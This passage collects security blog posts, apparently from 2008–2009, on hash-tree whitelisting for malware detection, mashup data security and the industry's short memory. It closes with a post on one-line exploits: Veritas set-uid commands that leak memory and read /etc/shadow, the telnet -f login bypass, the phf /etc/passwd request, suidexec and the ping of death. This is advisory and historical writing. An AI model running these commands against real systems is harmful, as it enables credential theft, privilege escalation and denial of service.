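import hashlib

def classify_chunks(data, whitelist, blacklist, size=4096):
    """Hybrid list check sketch: hash fixed-size chunks of `data` and
    classify each as malicious (blacklisted), known-good (whitelisted),
    or unknown (candidate for further analysis)."""
    verdicts = []
    for i in range(0, len(data), size):
        h = hashlib.sha256(data[i:i + size]).hexdigest()
        if h in blacklist:
            verdicts.append("malicious")
        elif h in whitelist:
            verdicts.append("known-good")
        else:
            verdicts.append("unknown")
    return verdicts
```

The point of chunking is that a file which is mostly known-good with one malicious or unknown chunk gets localized scrutiny instead of an all-or-nothing verdict.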
The real problem with mainstream anti-virus software is that it’s not stopping all of the structural variations in malware. PCs continue to contract viruses even when they’re loaded with all the latest anti-virus signatures. This is analogous to a biological virus that becomes resistant to a vaccine through mutation. Signature-based matching was effective for many years, but now the total set of malicious code far outweighs legitimate code. To compensate, contemporary anti-virus has been going against Ockham’s Razor by becoming too complex, compounding the problem as a result. It’s time for the security industry to make a long overdue about-face. Keep in mind that I’m not suggesting that current anti-virus software be abandoned. It does serve a purpose and will become part of the synthesis described above.
The fundamental change in motivation for digital offensive maneuvers, from hobbyist to monetary and geopolitical, warrants a paradigm shift in defensive countermeasure implementation. For what it’s worth, I am convinced that the aforementioned technique of whitelisting chunked hashes will be an invaluable force for securing the cloud. It will allow tailored information, metrics, and visualizations to be targeted toward various domain-specific applications and verticals: for example, finance, energy, government, or law enforcement, as well as the associated software inventory and asset management tasks of each. Our Clone Wars presentation featuring Pass The Hash (PTH) at Source Boston and CanSecWest will elaborate on our past few blog posts and much more. See you there!
=5.Jan.2009= [Mon] at [2:01] · Filed under Author: Derek Callaway, Digital Security, Security Industry, Systems Theory, WPF ·Tagged 25c3, anti-virus, api, automated, cansecwest, database, digital, forensics, gnu, gui, hacking, hash, information, linq, malware, maps, md6, merkle, meta-data, napster, nist, processes, pth, queue, research, rsa, screenshot, sha-3, signature, software, spam, stealth, system, tiger, tree, whitelist, WPF, xml
By now, the security industry must recognize that the future of Message-Digest algorithm 5 is hopelessly jeopardized. The rogue CA certificate presentation at 25C3 might as well have been the nail in the coffin. A little over a year ago, NIST opened up its Cryptographic Hash Algorithm Competition for the creation of SHA-3. In response, Ron Rivest (the ‘R’ in “RSA”) developed MD6 at MIT. Security Objectives has been tirelessly working on a little hashing project of its own: Pass The Hash.
The security industry is currently in the process of reluctantly accepting that the current signature-based approach to anti-virus and malware identification is futile. Therefore, our Pass The Hash solution utilizes a whitelist approach in conjunction with a custom hash tree data structure to wholly single out malware variants piece by piece. Moreover, non-disclosure agreements are a besetting factor in digital forensics investigations because the analyst cannot inquire about a malware specimen by sending it out verbatim; our solution solves that problem too.
Here’s how it works: you compute Tiger hashes of files on your system, query our central database, and we tell you what they belong to. If it doesn’t match one of our hashes, you know you’ve got a problem. Once you’ve identified a piece of malware, you can coordinate specifics with our community such as fixes, research, opinions, etc. All of this is in a really sleek WPF GUI because here at Security Objectives, we strive to make hacking look like the movies!
The hash computations that our software performs identify polymorphous variations similar to Context-Triggered Piecewise Hashes and Bloom Filters. There will also be an off-line mode where hashes can be compared against a local client-side database that deals with hash trees similar to our centralized database. Directories, drives, and even processes whose hashes need to be calculated are inserted into a dynamically managed queue; with the click of a button the queue can be re-prioritized, saved, elements can be removed, etc. Meta-data is associated with each hash object that describes attributes such as operating system, platform, user-specified information, etc.
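The internals of PTH haven’t been published, so what follows is only a generic Merkle-style hash-tree sketch (SHA-256 stands in for Tiger, which isn’t in the Python standard library). It shows why a tree over chunk hashes is useful: a single changed chunk perturbs only one branch, yet the whole object still reduces to one root value that can be compared or queried cheaply.

```python
import hashlib

def merkle_root(chunks):
    """Build a minimal Merkle tree over a list of byte chunks and return
    the root hash as hex. Odd levels duplicate their last node; an empty
    input hashes to the digest of the empty string. (Illustrative only.)"""
    level = [hashlib.sha256(c).digest() for c in chunks]
    if not level:
        return hashlib.sha256(b"").hexdigest()
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])  # pad odd level by duplicating last node
        level = [hashlib.sha256(level[i] + level[i + 1]).digest()
                 for i in range(0, len(level), 2)]
    return level[0].hex()
```

Two files that differ in one chunk produce different roots, while identical inputs always agree, which is what makes a root hash a usable database key.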
When we first started working on this we were thinking “napster for malware,” but it’s turned into so much more. More recently the description was “MRBL” (Malware Real-time Blackhole List), similar to the MAPS SPAM countermeasure except that it actually utilizes whitelist technology. “malster” sounds cool, but we decided to name it Pass The Hash, indicative of the hash value computation and transmission taking place. This venture is clearly distinguishable from GNU Pth (Portable Threads) because our acronym (PTH) is written in all caps. 😉
I can’t provide an exact release date right now–all I can say is very soon. Once it’s released you’ll be able to download it from our products page. The long-term plan is to slap an open source license on the client code, thereby exposing the XML API for the central database and LINQ for the local one. Organizations that require the achievement of total malware sovereignty can deploy a dedicated appliance that acts as a counterpart to the centralized hash database hosted by Security Objectives. So keep your eyes peeled for the upcoming release of Pass The Hash. In the meantime, sneak a peek at a screenshot.
P.S. After a long hiatus, we plan to be hitting the conference circuit once again to present on the specifics of this new reactive malware eradication technology. We’ve been submitting CFP’s left and right, but you’re most likely to catch up with us at CanSecWest. Hope to see you there!
=28.Nov.2008= [Fri] at [5:22] · Filed under Author: Derek Callaway, Digital Security, Philosophy, Security Industry, Software Assurance ·Tagged 2008, 2600, attacks, celebrities, code, corporate, hacked, insurance, internet, man-in-the-middle, memory, obama, password, phishing, phone, programmers, sdlc, security, short-term, spoofing, voicemail, weaknesses, wetware
Sometimes I get the feeling that too many Internet users (especially the younger generation) view 1995, or the beginning of commercialized Internet as the start of time itself. More specifically, I notice how people tend to have a short-term memory when it comes to security issues. A recent example of this was all the creative network exploitation scenarios that arose from the great DNS cache poisoning scare of 2008: intercepting e-mails destined for the MX of users who didn’t really click on “Forgot Password,” pushing out phony updates, innovative twists on spear phishing, etc. The fact of the matter is that man-in-the-middle attacks were always a problem; cache poisoning makes them easier but their feasibility has always been within reason. My point is that vendors should address such weaknesses before the proverbial fertilizer hits the windmill.
Too often, short-term memory is the catalyst for recurring breaches of information. Sometimes I wonder what (if anything) goes through the mind of one of those celebrities who just got their cell phone hacked for the third time. Maybe it’s something like, “Oh.. those silly hackers! They’ve probably gotten bored by now and they’ll just go away.” Then I wonder how often similar thoughts enter corporate security (in)decision–which is likely why cellular carriers neglect to shield their clientele’s voicemail from caller ID spoofing and other shenanigans. Nonetheless, the amusing charade that 2600 pulled on the Obama campaign for April Fool’s Day was simply a case of people believing everything they read on the Internet.
Don’t get me wrong. I’ve seen some major improvements in how larger software vendors are dealing with vulnerabilities, but an overwhelming majority of their security processes are still not up to par. Short-term memory is one of those cases where wetware is the weakest link in the system.
The idea of the digital security industry using long-term memory to become more like insurance companies and less like firefighters is quite intriguing. Putting protective forethought into the equation dramatically changes the playing field. Imagine an SDLC where programmers don’t have to know how to write secure code, or even patch vulnerable code for that matter. I can say for sure that such a proposition will become reality in the not too distant future. Stay tuned…
=2.Nov.2008= [Sun] at [21:30] · Filed under Author: Derek Callaway, Digital Security, Miscellaneous, Security Industry, Software Assurance ·Tagged analysis, applications, attacks, binary, business, capgemini, code, dynamic, html, javascript, malicious, mashup, model, networks, privileges, rsa, security, testing, third-party, trust, vista, vulnerability, whitelist

The buzzword “mashup” refers to the tying together of information and functionality from multiple third-party sources. Mashup projects are sure to become a monster of a security problem because of their very nature. This is what John Sluiter of Capgemini predicted at the RSA Europe conference last week during his “Trust in Mashups, the Complex Key” session. This is the abstract:
“Mashups represent a different business model for on-line business and require a specific approach to trust. This session sets out why Mashups are different, describes how trust should be incorporated into the Mashup-based service using Jericho Forum models and presents three first steps for incorporating trust appropriately into new Mashup services.”
Jericho Forum is the international IT security association that published the COA (Collaboration Oriented Architectures) framework. COA advocates the de-perimeterisation approach to security and stresses the importance of protecting data instead of relying on firewalls.
So what happens when data from various third-party sources traverses inharmonious networks, applications, and privilege levels? Inevitably, misidentifications occur; erroneous and/or malicious bytes pass through the perimeters. Sensitive data might be accessed by an unprivileged user, or attack strings could be received. A good example of such a vulnerability was in the Microsoft Windows Vista Sidebar: a malicious HTML tag gets rendered by the RSS gadget, and since it’s in the local zone, arbitrary JavaScript is executed with full privileges (MS07-048).
New generations of automated tools will need to be created in order to test applications developed using the mashup approach. Vulnerability scanners like Nessus, Nikto, and WebInspect are best used to discover known weaknesses in input validation and faulty configurations. What they’re not very good at is pointing out errors in custom business logic and more sophisticated attack vectors; that’s where the value of hiring a consultant to perform manual testing comes in.
Whether it’s intentional or not, how can insecure data be prevented from getting sent to or received from a third-party source? A whitelist can be applied to data that is on its way in or out—this helps, but it can be difficult when there are multiple systems and data encodings involved. There is also the problem of determining the presence of sensitive information.
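A minimal sketch of such a whitelist on outbound key/value data follows; the field names and the `filter_outbound` helper are hypothetical, and real deployments would also have to handle the multiple encodings mentioned above.

```python
import re

def filter_outbound(payload, allowed_fields):
    """Egress whitelist sketch: parse a query-string-style payload and
    keep only key=value pairs whose keys are explicitly allowed.
    Anything not on the whitelist (e.g., a sensitive field) is dropped."""
    kept = {}
    for key, value in re.findall(r"(\w+)=([^&]*)", payload):
        if key in allowed_fields:
            kept[key] = value
    return kept
```

Note the whitelist philosophy: the default action is to drop, so a sensitive field leaks only if someone explicitly allows it, rather than leaking unless someone remembers to block it.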
Detecting transmissions of insecure data can be accomplished with binary analyzers. However, static analyzers are at a big disadvantage because they lack execution context. Dynamic analysis is capable of providing more information by tainting data that comes from third-party sources, and dynamic analyzers are more adept at recognizing unexpected execution paths that tainted data may take after being received from the network or shared code.
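The taint-tracking idea can be caricatured in a few lines of Python. This is a toy, not a real dynamic analyzer: a naive wrapper like this loses its mark as soon as the string is transformed, and propagating taint through those operations is exactly the hard part real tools must solve.

```python
class Tainted(str):
    """Marks a string that arrived from an untrusted third-party source."""
    pass

def sensitive_sink(value):
    """A sink (e.g., an HTML renderer or SQL query) that refuses data
    still carrying the taint mark; validated/untainted data passes through."""
    if isinstance(value, Tainted):
        raise ValueError("tainted data reached a sensitive sink")
    return value
```

Trusted data flows through the sink unchanged, while wrapping third-party input in `Tainted` causes the sink to reject it until some validation step strips the mark.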
=22.Oct.2008= [Wed] at [16:44] · Filed under Author: Derek Callaway, Digital Security, Exploits ·Tagged administrator, advisories, attack, award, bandwidth, command, death, debian, example, exhaustion, exploit, foundation, history, information, kingcope, memory, one-liner, phf, ping, pwnie, root, security, sensitive, set-uid, shell, solaris, storage, suidexec, symantec, uninitialized, veritas, vulnerabilities, weakness

Every once in a while there are security vulnerabilities publicized that can be exploited with a single command. This week, Security Objectives published advisories for two such vulnerabilities (SECOBJADV-2008-04 and SECOBJADV-2008-05) which I’ll be describing here. I’ll also be revisiting some one-line exploits from security’s past for nostalgia’s sake and because history tends to repeat itself.
Both issues that were discovered are related to Symantec’s Veritas Storage Foundation Suite. They rely on the default set-uid root bits being set on the affected binaries. Before Symantec and Veritas combined, the Sun package manager prompted the administrator with the option of removing the set-id bits. The new Symantec installer just went ahead and set the bits without asking (how rude!)
On to the good stuff.. The first weakness is an uninitialized memory disclosure vulnerability. It can be leveraged like so:
/opt/VRTS/bin/qiomkfile -s 65536 -h 4096 foo
Now, the contents of file .foo (note that it is a dot-file) will contain uninitialized memory from previous file system operations–usually from other users. Sensitive information can be harvested by varying the values to the -s and -h flags over a period of time.
This next one is a bit more critical in terms of privilege escalation. It is somewhat similar to the Solaris srsexec hole from last year. Basically, you can provide any file’s pathname on the command line and have it displayed on stderr. As part of the shell command, I’ve redirected standard error back to standard output.
/opt/VRTSvxfs/sbin/qioadmin -p /etc/shadow / 2>&1
Some of these one-liner exploits can be more useful than exploits that utilize shellcode. Kingcope’s Solaris in.telnetd exploit is a beautiful example of that. The really interesting thing about that one was its resurrection–it originally became well-known back in 1994. In 2007, Kingcope’s version won the Pwnie award for best server-side bug.
telnet -l -fusername hostname
Let’s not forget other timeless classics such as the cgi-bin/phf bug, also from the mid-nineties:
lynx http://host.com/cgi-bin/phf?Qalias=/bin/cat%20/etc/passwd
..and Debian’s suidexec hole from the late nineties:
/usr/bin/suidexec /bin/sh /path/to/script
I’m not including exploits that have pipes/semi-colons/backticks/etc. in the command-line because that’s really more than one command being executed. Since the “Ping of Death” is a single command from a commonly installed system utility I’ll be including it here as well. I consider it a true denial of service attack since it does not rely on bandwidth exhaustion:
ping -s70000 -c1 host
EOF